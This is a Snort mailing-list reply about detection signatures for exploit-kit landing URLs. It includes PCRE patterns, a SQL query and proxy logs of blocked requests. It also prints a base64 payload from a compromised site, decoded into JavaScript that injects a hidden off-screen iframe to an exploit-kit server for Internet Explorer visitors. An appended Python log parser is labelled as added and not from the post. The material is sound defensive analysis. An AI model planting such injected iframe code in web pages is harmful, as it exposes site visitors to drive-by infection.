Snort mailing list archives
Re: Rig Exploit Kit outbound URI request signature
From: "lists () packetmail net" <lists () packetmail net>
Date: Thu, 10 Jul 2014 10:32:15 -0500
On 07/10/2014 10:21 AM, Nicholas Mavis (nmavis) wrote:
> No love for this rule?

TLP WHITE w/Attribution: It's not comprehensive though; there are many other names used, not just 'nbe', for example there is blde too. I am using this PCRE; I found this back on 5/27 related to the food.com compromise.

pcre:"/^\/[a-z]{1,6}\.html\?[0-9]\.[0-9]+[a-z]?$/U";

regex((?-i)^http:\/\/[^\x2f]+\/[a-z]{1,6}\.html\?[0-9]\.[0-9]+[a-z]?$)
Ryan C. Moon & Nathan Fowler, 2014-07-03, Modified from 2014-05-27 Angler EK Landing related to Food.com /ajax/ajax.js compromise.

The landing produces:

window.rctm('dmFyIHVhID0gbmF2aWdhdG9yLnVzZXJBZ2VudC50b0xvd2VyQ2FzZSgpO2lmKHVhLmluZGV4T2YoIm1zaWUiKSAhPSAtMSB8fCAoKHVhLmluZGV4T2YoInRyaWRlbnQiKSAhPSAtMSkgJiYgKHVhLmluZGV4T2YoInJ2OjExIikgIT0gLTEpKSl7dmFyIGQ9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnZGl2Jyk7dmFyIGY9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnaScrJ2ZyJysnYW1lJyk7Zi5zZXRBdHRyaWJ1dGUoJ3N0eWxlJywnd2lkdGg6MTAwcHg7aGVpZ2h0OjEwMHB4O3Bvc2l0aW9uOmFic29sdXRlO2xlZnQ6LTEwMDAwcHg7dG9wOjA7Jyk7Zi5zZXRBdHRyaWJ1dGUoJ3NyYycsICdodHRwOi8vdGFuc2V5bXVnbm9sby52dWxuZXJhYmxlYWR1bHRyZXNvdXJjZXMuY29tOjI5ODAvZjJ6YTUydHFmcS5waHAnKTtkLmFwcGVuZENoaWxkKGYpO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoZCk7fQ==');

Decoded this is:

var ua = navigator.userAgent.toLowerCase();
if(ua.indexOf("msie") != -1 || ((ua.indexOf("trident") != -1) && (ua.indexOf("rv:11") != -1))){
  var d=document.createElement('div');
  var f=document.createElement('i'+'fr'+'ame');
  f.setAttribute('style','width:100px;height:100px;position:absolute;left:-10000px;top:0;');
  f.setAttribute('src', 'http://tanseymugnolo.vulnerableadultresources.com:2980/f2za52tqfq.php');
  d.appendChild(f);
  document.body.appendChild(d);
}

Here are my samples from the query I ran on 07/03/2014:

SELECT date_time,client_ip,user_name,command,http_status,block_reason,url_body_size,dest_ip,url,url_referrer
FROM webwasher_full
WHERE day >= '2014-06-01'
  and ( url rlike '^http:\\/\\/[^\\x2f]+\\/[a-z]+\\.html\\?[0-9]\\.[0-9]+[a-z]?$' and http_status <> '407' )
ORDER BY dest_ip,date_time;

command http_status block_reason url_body_size dest_ip url url_referrer
GET 403 url-block 4689 108.162.199.144 meow://22fabf76.pw/blde.html?0.006334243109449744 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4689 108.162.199.144 meow://22fabf76.pw/blde.html?0.016409865114837885 meow://www.askmen.com/dating/player_150/193_love_games.html
GET 403 url-block 4665 108.162.198.144 meow://22fabf76.pw/blde.html?0.06354187265969813 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.07202741224318743 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_5.html
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.1041158998850733 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.10766582423821092 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4665 108.162.198.144 meow://22fabf76.pw/blde.html?0.13074382906779647 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.20054056216031313 meow://www.askmen.com/dating/player_250/293b_the-player-body-language-that-leads-to-sex.html
GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.23090991470962763 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.2415963737294078 meow://www.askmen.com/dating/player_150/193b_love_games.html
GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.24997977446764708 meow://www.askmen.com/dating/player/
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.2549178213812411 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_2.html
GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.26690258318558335 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_9.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.2707027194555849 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_3.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.2994266119785607 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.3438303011935204 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_1.html
GET 403 url-block 4665 108.162.198.144 meow://22fabf76.pw/blde.html?0.36082233721390367 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4665 108.162.198.144 meow://22fabf76.pw/blde.html?0.37289803847670555 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.3867847693618387 meow://www.askmen.com/dating/player_150/193b_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.4253211112227291 meow://www.askmen.com/dating/player_150/193_love_games.html
GET 403 url-block 4687 108.162.199.144 meow://22fabf76.pw/blde.html?0.44411907298490405 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.4443054897710681 meow://www.askmen.com/dating/player_150/193c_love_games.html
GET 403 url-block 4679 108.162.199.144 meow://22fabf76.pw/blde.html?0.4554368711542338 meow://www.askmen.com/money/how_to/best-man-speech.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.4781910087913275 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.5013891162816435 meow://www.askmen.com/dating/
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.5081519205123186 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual.html
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.6199873678851873 meow://www.askmen.com/dating/player_250/293_the-player-body-language-that-leads-to-sex.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.6605944740585983 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.6656237081624568 meow://www.askmen.com/dating/player/
GET 403 url-block 4681 108.162.199.144 meow://22fabf76.pw/blde.html?0.68715750426054 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_8.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.7267832655925304 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_7.html
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.8383729031775147 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4681 108.162.199.144 meow://22fabf76.pw/blde.html?0.85340212774463 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_10.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.8565535638481379 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_6.html
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.8595981544349343 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.8642684002406895 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.8773749363608658 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.8801867682486773 meow://www.askmen.com/dating/player_150/184_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9061996066011488 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9111072514206171 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9290966757107526 meow://www.askmen.com/dating/player_250/293_the-player-body-language-that-leads-to-sex.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9500252392608672 meow://www.askmen.com/top_10/dating/top-10-ways-to-tell-your-casual-relationship-isnt-casual_4.html
GET 403 url-block 4685 108.162.199.144 meow://22fabf76.pw/blde.html?0.9815117917023599 meow://www.askmen.com/dating/player/
GET 403 url-block 4663 108.162.198.144 meow://22fabf76.pw/blde.html?0.9978509696666151 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4718 108.162.198.14 meow://31674ec.pw/nbe.html?0.904447927671759 meow://www.123rf.com/stock-photo/shivering.html
GET 403 url-block 4753 108.162.199.92 meow://9b66653c.pw/nbe.html?0.08473309073626933 meow://www.askmen.com/fashion/fashiontip/the-best-chronograph-watches.html
GET 403 url-block 4753 108.162.199.92 meow://9b66653c.pw/nbe.html?0.17622659508624233 meow://www.askmen.com/fashion/fashiontip/the-best-chronograph-watches.html
GET 200 - 1022 108.162.198.92 meow://9b66653c.pw/nbe.html?0.5499927302485725 -
GET 403 url-block 4751 108.162.199.92 meow://9b66653c.pw/nbe.html?0.5499927302485725 meow://www.askmen.com/fashion/fashiontip/the-best-chronograph-watches-2.html
GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.06389605655075187 meow://www.askmen.com/top_10/cars/top-10-best-car-names_7.html
GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.17722866794067066 meow://www.askmen.com/top_10/cars/top-10-best-car-names_2.html
GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.20031634056180342 meow://www.askmen.com/top_10/cars/top-10-best-car-names_1.html
GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.24860330938667213 meow://www.askmen.com/top_10/cars/top-10-best-car-names_2.html
GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.27150209070258263 meow://www.askmen.com/top_10/cars/top-10-best-car-names_5.html
GET 403 url-block 4736 108.162.197.130 meow://be90becd.pw/nbe.html?0.284285031791501 meow://www.askmen.com/top_10/cars/top-10-best-car-names_6.html
GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.37768174085568545 meow://www.askmen.com/top_10/cars/top-10-best-car-names.html
GET 403 url-block 4740 108.162.197.130 meow://be90becd.pw/nbe.html?0.48231242343805913 meow://www.askmen.com/top_10/cars/top-10-best-car-names_3.html
GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.5128278504934043 meow://www.askmen.com/top_10/cars/top-10-best-car-names_4.html
GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.7540135384147115 meow://www.askmen.com/top_10/cars/top-10-best-car-names_3.html
GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.7734210000823842 meow://www.askmen.com/top_10/cars/top-10-best-car-names_9.html
GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.8939608857165528 meow://www.askmen.com/top_10/cars/top-10-best-car-names_10.html
GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.9601377932116697 meow://www.askmen.com/top_10/cars/top-10-best-car-names_2.html
GET 403 url-block 4738 108.162.197.130 meow://be90becd.pw/nbe.html?0.9989356211076701 meow://www.askmen.com/top_10/cars/top-10-best-car-names_8.html

Cheers,
Nathan Fowler
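The post gives the landing-page pattern in two forms (a Snort pcre with /U against the normalized URI, and a full-URL regex for the proxy-log query) and a dump of proxy records matching it. The following Python is an added example, not code from the post or from Snort/Talos: it parses records in the seven-column layout shown above, applies both patterns, confirms they agree, and pivots on referrer host and HTTP status so an analyst can see which referring sites are feeding the landing page and which clients actually reached it (status 200) rather than being blocked. It assumes the post's meow:// scheme is a defanged http:// and refangs it; the sample records are three lines taken from the post plus three constructed benign lines (marked as such) that show where the pattern stops matching and where it still fires on an innocent cache-buster.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Full-URL pattern from the post. Python's re is case-sensitive by default, so the
# post's leading (?-i) is unnecessary; [^\x2f] is written as [^/] (same meaning).
LANDING_URL_RE = re.compile(r"^http://[^/]+/[a-z]{1,6}\.html\?[0-9]\.[0-9]+[a-z]?$")

# Same pattern as the post's Snort pcre with the /U modifier: it is evaluated
# against the normalized request URI (path plus query), not the whole URL.
LANDING_URI_RE = re.compile(r"^/[a-z]{1,6}\.html\?[0-9]\.[0-9]+[a-z]?$")

# Column order of the records in the post (date_time, client_ip and user_name
# were not included in the pasted output).
FIELDS = ("command", "http_status", "block_reason", "url_body_size",
          "dest_ip", "url", "url_referrer")

# First three records are from the post; the last three are constructed
# benign traffic (example.com, RFC 5737 address) to exercise the boundaries.
SAMPLE_LOG = """\
GET 403 url-block 4689 108.162.199.144 meow://22fabf76.pw/blde.html?0.006334243109449744 meow://www.askmen.com/dating/player_150/184b_love_games.html
GET 403 url-block 4718 108.162.198.14 meow://31674ec.pw/nbe.html?0.904447927671759 meow://www.123rf.com/stock-photo/shivering.html
GET 200 - 1022 108.162.198.92 meow://9b66653c.pw/nbe.html?0.5499927302485725 -
GET 200 - 8812 203.0.113.10 http://www.example.com/index.html?v=3 http://www.example.com/
GET 200 - 512 203.0.113.10 http://www.example.com/a.html?0.42 http://www.example.com/
GET 200 - 2048 203.0.113.10 http://www.example.com/landing.html?0.5 -
"""


def refang(url):
    """Assumption: the post's meow:// is a defanged http://; restore it."""
    return "http://" + url[len("meow://"):] if url.startswith("meow://") else url


def parse_record(line):
    """Split one whitespace-separated record into a dict, or None if malformed."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["url"] = refang(rec["url"])
    rec["url_referrer"] = refang(rec["url_referrer"])
    return rec


def matches_landing(url):
    """Proxy-log form of the check (full URL)."""
    return LANDING_URL_RE.match(url) is not None


def uri_matches_landing(uri):
    """IDS form of the check (normalized request URI, as the /U pcre sees it)."""
    return LANDING_URI_RE.match(uri) is not None


def request_uri(url):
    """Reduce a full URL to the path+query that the Snort pcre would inspect."""
    s = urlsplit(url)
    return s.path + ("?" + s.query if s.query else "")


def summarize(log_text):
    """Apply the pattern to every record and pivot on host, referrer and status."""
    hits = []
    referrers = Counter()
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None or not matches_landing(rec["url"]):
            continue
        # The URL-level and URI-level patterns must agree on every hit.
        assert uri_matches_landing(request_uri(rec["url"]))
        hits.append(rec)
        if rec["url_referrer"] != "-":
            referrers[urlsplit(rec["url_referrer"]).hostname] += 1
    return {
        "hits": len(hits),
        # Requests that were not blocked by the proxy: the clients to triage first.
        "allowed": sum(1 for r in hits if r["http_status"] == "200"),
        "landing_hosts": sorted({urlsplit(r["url"]).hostname for r in hits}),
        "referrer_hosts": referrers,
    }


if __name__ == "__main__":
    result = summarize(SAMPLE_LOG)
    print(f"{result['hits']} hits, {result['allowed']} reached the landing page")
    print("landing hosts:", ", ".join(result["landing_hosts"]))
    for host, n in result["referrer_hosts"].most_common():
        print(f"  referrer {host}: {n}")
```

Two things the run makes visible: the post's own sample with status 200 and no referrer is the one request that was not blocked, so its client would be the first to look at; and the constructed `a.html?0.42` record matches too, because any one-to-six-letter page name with a float-looking cache-buster satisfies the pattern, while `landing.html` (seven letters) and `index.html?v=3` do not. That is the false-positive surface the post's "not comprehensive" caveat hints at from the other direction, and it is why the referrer pivot (here askmen.com and 123rf.com) matters alongside the raw URI match.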
Current thread:
- Rig Exploit Kit outbound URI request signature Nicholas Mavis (nmavis) (Jul 03)
- <Possible follow-ups>
- Re: Rig Exploit Kit outbound URI request signature Nicholas Mavis (nmavis) (Jul 03)
- Re: Rig Exploit Kit outbound URI request signature Nicholas Mavis (nmavis) (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Nicholas Mavis (nmavis) (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature lists () packetmail net (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature lists () packetmail net (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature lists () packetmail net (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)
- Re: Rig Exploit Kit outbound URI request signature Geoffrey Serrao (Jul 10)